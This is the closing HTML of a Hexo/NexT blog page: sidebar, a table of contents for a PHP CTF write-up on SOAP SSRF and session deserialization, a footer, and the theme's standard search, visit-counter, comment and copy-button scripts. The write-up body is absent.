                    <span class="site-state-item-count">13</span>
                    <span class="site-state-item-name">Artikel</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">4</span>
                    <span class="site-state-item-name">Kategorien</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">5</span>
                    <span class="site-state-item-name">Tags</span>
                  </a>
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  <a href="https://github.com/passer6y" target="_blank" title="GitHub"><i class="fa fa-fw fa-github"></i>GitHub</a>
                  
                </span>
              
                <span class="links-of-author-item">
                  <a href="mailto:passer6y@d0g3.cn" target="_blank" title="E-Mail"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  
                </span>
              
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.wefun.win/" title="WeFun" target="_blank">WeFun</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Babyphp’s-revenge"><span class="nav-number">1.</span> <span class="nav-text">Babyphp’s revenge</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#一：-soap-ssrf"><span class="nav-number">1.1.</span> <span class="nav-text">一： soap ssrf</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#二：php-session反序列化"><span class="nav-number">1.2.</span> <span class="nav-text">二：php session反序列化</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#最后"><span class="nav-number">1.3.</span> <span class="nav-text">最后</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; 2017 &mdash; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Passer6y</span>

  

  
</div>




<div class="powered-by">
<i class="fa fa-user-md"></i><span id="busuanzi_container_site_uv">
  本站访客数:<span id="busuanzi_value_site_uv"></span>
</span>
</div>

 



  <span class="post-meta-divider">|</span>



<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共35.7k字</span>
</div>
        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.3.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.3.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.3.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.3.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.3.0"></script>



  



	





  





  








  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  
  
  <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
  
  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(function (item) {
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: true,
        notify: false,
        appId: '3Jm4JutlBzR7fb3fxICb50pS-gzGzoHsz',
        appKey: 'TDRlM3HCI03SteHoOtVxJIMS',
        placeholder: 'Just go go',
        avatar:'mm',
        guest_info:guest,
        pageSize:'10' || 10,
    });
  </script>



  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>




  
  
  
  <link rel="stylesheet" href="/lib/algolia-instant-search/instantsearch.min.css">

  
  
  <script src="/lib/algolia-instant-search/instantsearch.min.js"></script>
  

  <script src="/js/src/algolia-search.js?v=6.3.0"></script>



  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("3Jm4JutlBzR7fb3fxICb50pS-gzGzoHsz", "TDRlM3HCI03SteHoOtVxJIMS");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            
            counter.save(null, {
              success: function(counter) {
                
                  var $element = $(document.getElementById(url));
                  $element.find('.leancloud-visitors-count').text(counter.get('time'));
                
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            
              var $element = $(document.getElementById(url));
              $element.find('.leancloud-visitors-count').text('Counter not initialized! See more at console err msg.');
              console.error('ATTENTION! LeanCloud counter has security bug, see here how to solve it: https://github.com/theme-next/hexo-leancloud-counter-security. \n But you also can use LeanCloud without security, by set \'security\' option to \'false\'.');
            
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  

  
  

  

  

  

  

  
  <style>
    .copy-btn {
      display: inline-block;
      padding: 6px 12px;
      font-size: 13px;
      font-weight: 700;
      line-height: 20px;
      color: #333;
      white-space: nowrap;
      vertical-align: middle;
      cursor: pointer;
      background-color: #eee;
      background-image: linear-gradient(#fcfcfc, #eee);
      border: 1px solid #d5d5d5;
      border-radius: 3px;
      user-select: none;
      outline: 0;
    }

    .highlight-wrap .copy-btn {
      transition: opacity .3s ease-in-out;
      opacity: 0;
      padding: 2px 6px;
      position: absolute;
      right: 4px;
      top: 8px;
    }

    .highlight-wrap:hover .copy-btn,
    .highlight-wrap .copy-btn:focus {
      opacity: 1
    }

    .highlight-wrap {
      position: relative;
    }
  </style>
  <script>
    $('.highlight').each(function (i, e) {
      var $wrap = $('<div>').addClass('highlight-wrap')
      $(e).after($wrap)
      $wrap.append($('<button>').addClass('copy-btn').append('Copy').on('click', function (e) {
        var code = $(this).parent().find('.code').find('.line').map(function (i, e) {
          return $(e).text()
        }).toArray().join('\n')
        var ta = document.createElement('textarea')
        document.body.appendChild(ta)
        ta.style.position = 'absolute'
        ta.style.top = '0px'
        ta.style.left = '0px'
        ta.value = code
        ta.select()
        ta.focus()
        var result = document.execCommand('copy')
        document.body.removeChild(ta)
        
          if(result)$(this).text('Copied')
          else $(this).text('Copy failed')
        
        $(this).blur()
      })).on('mouseleave', function (e) {
        var $b = $(this).find('.copy-btn')
        setTimeout(function () {
          $b.text('Copy')
        }, 300)
      }).append(e)
    })
  </script>


</body>
</html>
